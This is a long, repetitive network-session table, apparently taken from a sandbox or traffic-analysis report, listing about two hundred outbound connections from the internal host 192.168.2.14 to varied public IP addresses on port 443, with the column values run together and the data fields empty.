                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17636192.168.2.143280627.229.126.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17637192.168.2.1441452180.141.39.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17638192.168.2.145572497.181.54.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17639192.168.2.1441018192.229.243.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17640192.168.2.1437472168.169.8.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17641192.168.2.1450964117.247.200.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17642192.168.2.1457736175.74.243.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17643192.168.2.1448772190.245.17.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17644192.168.2.1437774212.135.165.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17645192.168.2.1433504213.193.208.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17646192.168.2.144992618.145.47.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17647192.168.2.144194838.201.30.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17648192.168.2.1442886211.88.188.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17649192.168.2.1446948173.16.157.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17650192.168.2.1434170107.244.195.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17651192.168.2.1453268211.144.129.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17652192.168.2.144092659.79.124.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17653192.168.2.145261458.241.223.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17654192.168.2.1448082148.220.120.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17655192.168.2.14561588.95.147.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17656192.168.2.1446684189.58.239.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17657192.168.2.144784290.34.93.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17658192.168.2.1453472201.170.206.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17659192.168.2.1442348118.95.62.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17660192.168.2.144324817.49.190.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17661192.168.2.145193663.14.202.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17662192.168.2.145859888.75.237.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17663192.168.2.1459636153.228.96.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17664192.168.2.1447154124.98.37.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17665192.168.2.1450040194.133.117.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17666192.168.2.1457318185.102.60.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17667192.168.2.1443604110.246.193.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17668192.168.2.14346662.228.204.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17669192.168.2.144639831.136.41.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17670192.168.2.143744238.17.190.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17671192.168.2.1455268222.172.9.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17672192.168.2.1459886119.232.161.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17673192.168.2.1452678177.51.52.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17674192.168.2.1456538165.214.252.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17675192.168.2.143747036.211.139.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17676192.168.2.144978452.65.153.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17677192.168.2.144482495.178.249.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17678192.168.2.143712452.198.39.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17679192.168.2.144747889.217.152.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17680192.168.2.143791899.228.117.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17681192.168.2.146028027.148.106.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17682192.168.2.1457506103.145.224.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17683192.168.2.144783482.239.214.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17684192.168.2.145494095.13.72.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17685192.168.2.1441630167.183.178.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17686192.168.2.1458160137.4.130.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17687192.168.2.144826637.244.197.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17688192.168.2.144916492.102.88.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17689192.168.2.1453488105.1.43.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17690192.168.2.1459222111.69.127.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17691192.168.2.1451350138.130.200.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17692192.168.2.145387825.172.103.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17693192.168.2.1442120187.151.100.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17694192.168.2.144218883.79.223.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17695192.168.2.1451886112.189.173.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17696192.168.2.1449352158.56.255.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17697192.168.2.143844047.5.238.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17698192.168.2.143557250.199.98.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17699192.168.2.1440872157.102.160.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17700192.168.2.1451566202.20.89.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17701192.168.2.1448734155.86.77.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17702192.168.2.1445280212.32.141.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17703192.168.2.14389348.199.67.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17704192.168.2.1460346202.208.99.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17705192.168.2.144008670.184.82.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17706192.168.2.1452994163.134.29.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17707192.168.2.143459884.91.236.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17708192.168.2.1438426114.34.130.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17709192.168.2.1450284118.139.6.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17710192.168.2.1451800125.174.45.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17711192.168.2.1460018109.161.9.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17712192.168.2.145623644.179.93.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17713192.168.2.1433266126.227.210.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17714192.168.2.1458788222.18.184.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17715192.168.2.14385245.255.53.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17716192.168.2.145738219.230.16.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17717192.168.2.145135879.103.115.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17718192.168.2.143997683.25.22.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17719192.168.2.144209837.60.23.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17720192.168.2.145763644.198.218.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17721192.168.2.1442546217.251.240.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17722192.168.2.1445638166.230.204.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17723192.168.2.145296017.200.149.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17724192.168.2.1446572115.37.2.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17725192.168.2.146073466.86.57.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17726192.168.2.1459300182.41.116.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17727192.168.2.144327894.127.192.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17728192.168.2.143739263.194.206.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17729192.168.2.1448848180.89.212.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17730192.168.2.1444116203.77.127.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17731192.168.2.1458420132.131.31.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17732192.168.2.144894237.146.44.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17733192.168.2.1444742140.204.247.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17734192.168.2.146023632.174.147.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17735192.168.2.1458176152.228.4.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17736192.168.2.145169487.252.74.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17737192.168.2.1446800165.154.34.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17738192.168.2.1460660205.97.189.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17739192.168.2.1442920143.99.196.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17740192.168.2.1442518165.61.80.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17741192.168.2.145920439.132.72.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17742192.168.2.1453900183.222.49.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17743192.168.2.1460218113.55.139.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17744192.168.2.144320273.94.4.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17745192.168.2.1455372134.111.205.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17746192.168.2.145224620.205.120.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17747192.168.2.1441550105.128.169.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17748192.168.2.143743698.18.25.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17749192.168.2.1440624153.245.98.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17750192.168.2.14466909.109.212.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17751192.168.2.144475695.250.71.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17752192.168.2.1442344171.17.249.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17753192.168.2.145603423.20.173.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17754192.168.2.1444714124.43.41.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17755192.168.2.1450076216.226.68.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17756192.168.2.144588086.220.108.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17757192.168.2.1435410223.37.167.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17758192.168.2.1450540111.203.213.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17759192.168.2.1444042117.169.151.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17760192.168.2.1433518117.243.175.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17761192.168.2.1436774181.18.150.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17762192.168.2.1450976182.178.231.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17763192.168.2.1450542102.236.182.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17764192.168.2.1443312197.2.182.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17765192.168.2.1452786123.178.40.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17766192.168.2.1457184164.153.244.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17767192.168.2.1446164170.190.126.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17768192.168.2.1455728124.87.123.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17769192.168.2.145672090.145.54.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17770192.168.2.145120493.50.26.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17771192.168.2.1452020155.45.29.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17772192.168.2.1445576206.99.168.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17773192.168.2.1440716128.158.224.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17774192.168.2.143752694.186.199.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17775192.168.2.1434738159.30.66.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17776192.168.2.1456500212.218.248.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17777192.168.2.145523417.78.89.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17778192.168.2.1434786207.147.166.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17779192.168.2.145502414.143.40.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17780192.168.2.143715077.18.136.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17781192.168.2.145614213.239.184.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17782192.168.2.1454942148.253.186.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17783192.168.2.1453420118.158.213.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17784192.168.2.143505047.220.211.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17785192.168.2.1443922122.194.225.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17786192.168.2.1449234145.120.78.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17787192.168.2.1458718138.203.165.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17788192.168.2.1449474220.51.11.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17789192.168.2.145015692.220.198.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17790192.168.2.145439893.255.146.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17791192.168.2.1440710108.94.127.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17792192.168.2.1439264219.217.43.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17793192.168.2.144679625.243.163.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17794192.168.2.144686648.219.123.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17795192.168.2.1442006161.180.220.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17796192.168.2.144303071.140.43.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17797192.168.2.1460532119.11.42.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17798192.168.2.144371620.191.191.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17799192.168.2.146055439.33.204.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17800192.168.2.1459902143.190.95.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17801192.168.2.1455012206.174.241.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17802192.168.2.1448274168.240.141.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17803192.168.2.1434486196.193.180.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17804192.168.2.1453844146.92.23.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17805192.168.2.144076469.184.139.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17806192.168.2.1444496192.33.102.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17807192.168.2.1454920122.242.88.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17808192.168.2.1453512136.220.206.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17809192.168.2.1454572208.69.16.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17810192.168.2.1452790219.20.202.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17811192.168.2.1436954124.204.204.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17812192.168.2.143352475.33.242.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17813192.168.2.1450012150.81.75.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17814192.168.2.1441572204.238.119.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17815192.168.2.1446318132.247.211.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17816192.168.2.1438864209.205.174.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17817192.168.2.1451180210.110.36.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17818192.168.2.1439566197.123.50.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17819192.168.2.1447910189.173.239.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17820192.168.2.1433544108.117.253.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17821192.168.2.1445566113.6.187.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17822192.168.2.145332840.203.37.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17823192.168.2.1453656152.242.35.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17824192.168.2.144282424.149.41.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17825192.168.2.1445188208.240.14.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17826192.168.2.145754627.247.95.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17827192.168.2.1434950137.119.159.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17828192.168.2.143889036.254.40.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17829192.168.2.143764036.136.188.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17830192.168.2.1435802171.217.254.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17831192.168.2.1456060181.92.1.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17832192.168.2.143934489.84.65.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17833192.168.2.143598245.43.179.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17834192.168.2.145219878.236.78.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17835192.168.2.1450820194.33.110.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17836192.168.2.1453346124.30.16.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17837192.168.2.143316017.152.96.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17838192.168.2.145034878.69.145.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17839192.168.2.145572892.161.213.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17840192.168.2.1441964159.96.62.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17841192.168.2.1433934106.249.81.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17842192.168.2.144803884.184.114.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17843192.168.2.1459286200.239.78.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17844192.168.2.143802886.156.109.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17845192.168.2.1433672197.85.11.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17846192.168.2.1458148141.44.204.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17847192.168.2.144959680.110.129.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17848192.168.2.1445400135.231.61.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17849192.168.2.1459064138.6.196.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17850192.168.2.144860232.102.145.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17851192.168.2.14418308.187.138.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17852192.168.2.1457144183.192.170.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17853192.168.2.144495259.71.219.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17854192.168.2.144241299.221.167.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17855192.168.2.145470032.34.197.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17856192.168.2.144782823.235.249.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
